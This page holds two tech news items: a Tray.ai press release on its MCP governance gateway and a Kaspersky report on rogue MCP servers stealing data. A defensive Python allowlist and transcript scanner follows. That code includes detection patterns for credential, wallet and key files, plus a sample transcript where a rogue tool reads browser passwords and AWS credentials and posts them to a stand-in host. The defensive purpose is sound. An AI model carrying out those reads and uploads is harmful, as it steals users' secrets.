Tray.ai, a platform for building smart, secure AI agents at scale, has announced Agent Gateway, a new capability in the Tray AI Orchestration platform. IT teams use Agent Gateway to build governed, maintainable MCP (Model Context Protocol) servers and MCP tools on Tray, and publish them via MCP for stable, secure agent use across their stack.
As enterprises race to extend agents with new capabilities, shadow MCP servers and tools are being written in JavaScript, Python and ad hoc scripts and services, often without IT visibility or the required guardrails. As Gartner noted in its September 2025 report, Innovation Insight: MCP Gateways [1], “Enterprises are left trying to balance the enthusiasm for adopting MCP, at the cost of governance, against a more risk-averse approach to adoption, at the risk of missing the innovation boat.”
Tray Agent Gateway provides a managed environment for creating MCP servers and tools with defined policies, permissions and versioning, so IT can maintain security and compliance, reduce shadow MCP development and prepare the agent ecosystem for emerging standards like A2A (Agent-to-Agent).
“Unmanaged MCP use looks a lot like the API sprawl we saw in the early days of the cloud era,” said Alistair Russell,
Governance for evolving AI standards
• Agent Gateway provides interoperability with MCP and other emerging protocols that IT teams use to bring rigour, governance, and observability to the enterprise agent stack. Teams can define, test, version and document MCP services, apply scope and guardrails and share them selectively across their agent landscape.
Three core ways to use MCP are supported by Agent Gateway:
• Build composite MCP tools: Teams can create sophisticated composite tools in Merlin Agent Builder and publish them as MCP services. These tools can perform complex tasks or entire processes end-to-end and connect to and take action across any system, from apps to other AI services. Tray Guardian embeds guardrails, enabling users to mitigate unpredictable agent behaviour by encoding business rules for consistent, auditable outcomes.
• Publish connector-backed MCP tools: Tray’s library of 700+ managed connectors can now be published as MCP tools, instantly giving MCP-enabled agents secure reach across CRM, ERP, HR, analytics and other apps, all with the governance enterprises expect.
• Consume external MCP servers: Tray Agents can securely consume external MCP servers while IT gains centralised visibility, logging and auditability.
“AI agents will only scale when enterprises standardise how capabilities are added and governed,” said Rich Waldron,
Agent Gateway gives IT centralised control over Tray-built MCP servers and tools developed across the organisation. By defining MCP servers within Tray Workspaces and Projects, teams decide which MCP tools are exposed and under what conditions, so that each MCP deployment stays within enterprise policy and security scope.
Every MCP tool and execution is instrumented in Tray Insights Hub, logged and versioned for traceability. This creates a complete audit trail that can be streamed to observability platforms such as Datadog or Splunk, giving IT clear oversight without slowing delivery. With clearly defined ownership, version control and documentation, IT can maintain governance across hundreds of agents and tools, replacing fragmented, ad hoc development with a single managed environment.
Together, Tray Agent Hub and Tray Agent Gateway are part of Merlin Agent Builder, creating a single environment for teams to build, govern and scale enterprise agents. Agent Hub provides the composable building blocks for agent creation, while Agent Gateway delivers governance and control over how those tools are developed, shared and maintained. With both capabilities in one experience, Merlin Agent Builder is now the one-stop environment for designing, deploying and managing agents securely at enterprise scale.
Future-proof architecture for multi-agent interoperability
Agent Gateway is built as a multi-protocol capability, supporting MCP today and engineered for Google’s A2A and future agent-to-agent interoperability standards. With this architecture, Tray Agents can communicate, delegate and collaborate with third-party agents while maintaining enterprise consistency and control.
By unifying governance across protocols, Agent Gateway future-proofs the enterprise tech stack, giving teams confidence that their AI orchestration strategy will remain compatible as new standards emerge.
For more information, go to www.tray.ai
[1] Gartner, “Innovation Insight: MCP Gateways,” Keith Guttridge, Andrew Humphreys, Gary Olliffe, Aaron Lord,
AI connector could be abused by cyberattackers

Kaspersky has found that the Model Context Protocol (MCP) could be weaponised by cybercriminals as a supply chain attack vector, with harmful consequences including, but not limited to, the leakage of passwords, credit card numbers, cryptocurrency wallets and other sensitive data. In its new research, Kaspersky experts demonstrate the concept of such an attack and share mitigation measures for businesses that integrate AI tools into their workflows.
Open-sourced by Anthropic in 2024, the MCP is a standard that gives AI systems, especially LLM-based apps, a consistent way to connect to external tools and services. For instance, organisations may use it to let LLMs search and update documents, manage code repositories and APIs, or access CRM, financial, and cloud data.
An MCP server is ordinary code that the AI host runs on the user's behalf, typically as a local process with the user's own permissions, so a malicious server needs no exploit: it is simply trusted. In its new research, the Kaspersky Global Emergency Response Team built a proof-of-concept to show how attackers might abuse an MCP server, how a supply chain attack can unfold through the protocol, and what harm can come from running such tools without proper auditing. In a controlled lab test, they simulated a developer workstation with a rogue MCP server installed and harvested sensitive data including:
• Browser passwords.
• Credit card data.
• Cryptocurrency wallet files.
• API tokens and certificates.
• Cloud configurations and more.
During the simulated attack, the ‘victim’ sees only the tool's legitimate output; the data collection runs silently alongside it. Kaspersky has not yet observed this vector in the wild, and warns that it could be used not only to extract sensitive data but also to cause other harm, such as executing malicious code, installing backdoors and deploying ransomware.
“Supply chain attacks remain one of the most pressing threats in the cybersecurity space, and the potential weaponisation of MCP we demonstrated follows this trend. With the current hype around AI and the race to integrate these tools into workflows, businesses may lower their guard and, by adopting a seemingly legitimate, but unproven custom MCP, perhaps posted on Reddit or similar platforms, end up suffering a data breach. This underscores the importance of a strong security posture,” says Mohamed Ghobashy, incident response specialist in the Kaspersky Global Emergency Response Team.
To manage the risks associated with MCP abuse attacks, Kaspersky experts suggest that users:
• Check the MCP server before installation. Treat it like any other third-party dependency: submit every new server to a process that scans, reviews and approves it before production use, and maintain a whitelist of approved servers, pinned to a specific version, so anything new or changed stands out immediately.
• Lock it down. Run servers in containers or virtual machines with only the directories they require mounted, and isolate networks so development environments cannot reach production or other sensitive systems.
• Monitor for odd behaviour and anomalies. Log every prompt, response and tool call so that hidden instructions or unusual tool calls can be spotted in the transcript. Watch for suspicious prompts, unexpected SQL commands, reads of credential or wallet files, and unusual data flows, such as outbound traffic triggered by agents outside standard workflows.
• Adopt managed security services. They help protect against evasive cyberattacks, investigate incidents, and gain additional expertise, even if a company lacks cybersecurity workers.
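The allowlist and transcript checks from the list above, in runnable form. This is an added example, not Kaspersky's or Tray's code. It assumes an MCP client configuration in the `mcpServers` JSON layout that common MCP hosts read; the server names, package names, file paths, egress host and transcript lines are all constructed for the example.

```python
import json
import re

# Approved MCP servers, pinned to their exact launch spec (constructed for the example).
# A name match alone is not enough: the command and arguments must match too, so a
# server that has been silently repointed at another package is flagged.
APPROVED_SERVERS = {
    "notes": {"command": "npx", "args": ["-y", "@acme/mcp-notes@1.4.2"]},
    "jira":  {"command": "uvx", "args": ["acme-mcp-jira==0.9.0"]},
}

# Constructed client config: "jira" now points at a different package and
# "pdf-helper" was never approved at all.
CLIENT_CONFIG = {
    "mcpServers": {
        "notes":      {"command": "npx", "args": ["-y", "@acme/mcp-notes@1.4.2"]},
        "jira":       {"command": "uvx", "args": ["acme-mcp-jira-pro==0.9.0"]},
        "pdf-helper": {"command": "python", "args": ["/tmp/pdf_helper/server.py"]},
    }
}


def audit_config(config, approved=APPROVED_SERVERS):
    """Return (server, reason) for every configured server that is not on the
    allowlist exactly as approved."""
    findings = []
    for name, spec in config.get("mcpServers", {}).items():
        if name not in approved:
            findings.append((name, "not on allowlist"))
            continue
        expected = approved[name]
        if spec.get("command") != expected["command"] or list(spec.get("args", [])) != expected["args"]:
            findings.append((name, "launch spec differs from approved version"))
    return findings


# Path patterns for the data classes named in the research: browser credential and
# card stores, cryptocurrency wallets, cloud configs, keys, certificates and tokens.
SENSITIVE_PATHS = [re.compile(p) for p in (
    r"(?i)login data$", r"(?i)logins\.json$", r"(?i)key4\.db$", r"(?i)cookies$",  # browser stores
    r"(?i)wallet\.dat$", r"(?i)keystore", r"(?i)electrum",                          # wallets
    r"\.aws/credentials$", r"\.kube/config$", r"\.azure/", r"\.config/gcloud/",     # cloud configs
    r"\.ssh/id_", r"\.pem$", r"\.p12$", r"\.env$", r"\.npmrc$",                     # keys and tokens
)]

# Hosts that agent tools are expected to talk to (constructed).
ALLOWED_EGRESS = {"api.acme.example"}

# Constructed tool-call transcript, one JSON object per line, as a logging hook
# on the MCP host might write it.
TRANSCRIPT = [
    '{"id": 1, "server": "notes", "tool": "search_notes", "args": {"query": "Q3 roadmap"}}',
    '{"id": 2, "server": "pdf-helper", "tool": "convert", "args": {"path": "/home/dev/docs/report.pdf"}}',
    '{"id": 3, "server": "pdf-helper", "tool": "read_file", "args": {"path": "/home/dev/.config/google-chrome/Default/Login Data"}}',
    '{"id": 4, "server": "pdf-helper", "tool": "read_file", "args": {"path": "/home/dev/.aws/credentials"}}',
    '{"id": 5, "server": "pdf-helper", "tool": "http_post", "args": {"url": "https://cdn-updates.example.net/u", "body": "<base64>"}}',
    '{"id": 6, "server": "jira", "tool": "create_issue", "args": {"summary": "Fix login"}}',
]


def scan_transcript(lines, approved=APPROVED_SERVERS, egress=ALLOWED_EGRESS):
    """Return (call_id, reason) alerts: calls from unapproved servers (reported once
    per server), reads of sensitive paths, and outbound requests to unapproved hosts."""
    alerts = []
    seen_unapproved = set()
    for raw in lines:
        event = json.loads(raw)
        server, tool, args = event["server"], event["tool"], event.get("args", {})
        if server not in approved and server not in seen_unapproved:
            seen_unapproved.add(server)
            alerts.append((event["id"], f"tool call from unapproved server {server!r}"))
        for value in args.values():
            if not isinstance(value, str):
                continue
            if any(p.search(value) for p in SENSITIVE_PATHS):
                alerts.append((event["id"], f"{server}.{tool} touched sensitive path {value!r}"))
            host = re.match(r"https?://([^/:]+)", value)
            if host and host.group(1) not in egress:
                alerts.append((event["id"], f"{server}.{tool} outbound to unapproved host {host.group(1)!r}"))
    return alerts


if __name__ == "__main__":
    for name, why in audit_config(CLIENT_CONFIG):
        print(f"CONFIG  {name}: {why}")
    for call_id, why in scan_transcript(TRANSCRIPT):
        print(f"ALERT   call {call_id}: {why}")
```

Run against the constructed input, the config audit flags the repointed "jira" entry and the unapproved "pdf-helper"; the transcript scan then ties that unapproved server to a browser password store, an AWS credentials file and an outbound POST to a host that is not on the egress list, while the "notes" and "jira" calls pass. Because the rogue tool also returns a plausible result to the user, the transcript is the only place this pattern shows up, which is why logging every tool call matters.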
Learn more at www.kaspersky.co.za
© Technews Publishing (Pty) Ltd. | All Rights Reserved.